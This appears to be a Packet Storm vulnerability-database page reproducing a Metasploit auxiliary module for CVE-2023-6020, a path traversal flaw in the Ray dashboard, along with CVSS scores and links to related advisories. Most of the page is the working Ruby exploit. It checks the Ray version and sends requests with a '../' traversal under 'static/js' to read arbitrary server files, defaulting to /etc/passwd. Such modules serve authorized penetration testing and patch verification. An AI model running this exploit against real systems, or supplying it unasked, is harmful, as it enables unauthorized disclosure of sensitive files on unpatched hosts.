Lucene search
Byt3bl33d3r, Takahiro Yokoyama, danmcinerney, metasploit.comPACKETSTORM:180669HistoryAug 31, 2024 - 12:00 a.m.
Ray Static Arbitrary File Read
2024-08-3100:00:00
byt3bl33d3r, Takahiro Yokoyama, danmcinerney, metasploit.com
packetstormsecurity.com
10
metasploit
file inclusion
vulnerability
lfi
ray
2023-6020
http
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
7
Confidence
Low
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Ray static arbitrary file read',
'Description' => %q{
Ray before 2.8.1 is vulnerable to a local file inclusion.
},
'Author' => [
'byt3bl33d3r <[email protected]>', # Python Metasploit module
'danmcinerney <[email protected]>', # Python Metasploit module
'Takahiro Yokoyama' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-6020'],
['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'],
['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']
],
'DisclosureDate' => '2023-11-15',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ IOC_IN_LOGS, ],
'Reliability' => []
}
)
)
register_options(
[
Opt::RPORT(8265),
OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd'])
]
)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api/version')
})
return Exploit::CheckCode::Unknown unless res && res.code == 200
ray_version = res.get_json_document['ray_version']
return Exploit::CheckCode::Unknown unless ray_version
return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')
file_content = lfi('/etc/passwd')
return Exploit::CheckCode::Vulnerable unless file_content.nil?
Exploit::CheckCode::Appears
end
def lfi(filepath)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}")
})
return unless res && res.code == 200
res.body
end
def run
file_content = lfi(datastore['FILEPATH'])
fail_with(Failure::Unknown, 'Failed to execute LFI') unless file_content
print_good("#{datastore['FILEPATH']}\n#{file_content}")
end
end
`
Related
prion
prion
Authentication flaw
2023-11-16 21:15:00
Authentication flaw
2023-11-16 17:15:00
Command injection
2023-11-16 17:15:00
cvelist
cvelist
CVE-2023-6020 Ray Static File Local File Include
2023-11-16 21:07:33
CVE-2023-6021 Ray Log File Local File Include
2023-11-16 16:11:42
CVE-2023-6019 Ray Command Injection in cpu_profile Parameter
2023-11-16 16:12:07
nuclei
nuclei
Ray Static File - Local File Inclusion
2023-12-05 16:15:41
metasploit
metasploit
Ray static arbitrary file read
2024-08-08 23:51:14
nvd
nvd
cve
cve
github
github
Ray Missing Authorization vulnerability
2023-11-16 21:30:46
Ray Path Traversal vulnerability
2023-11-16 18:30:31
osv
osv
Ray Missing Authorization vulnerability
2023-11-16 21:30:46
Ray Path Traversal vulnerability
2023-11-16 18:30:31
thn
thn
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up 08/30/2024
2024-08-30 18:43:05
openvas
openvas
Generic HTTP Directory Traversal (Web Dirs) - Active Check
2021-07-22 00:00:00
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
7
Confidence
Low
Related for PACKETSTORM:180669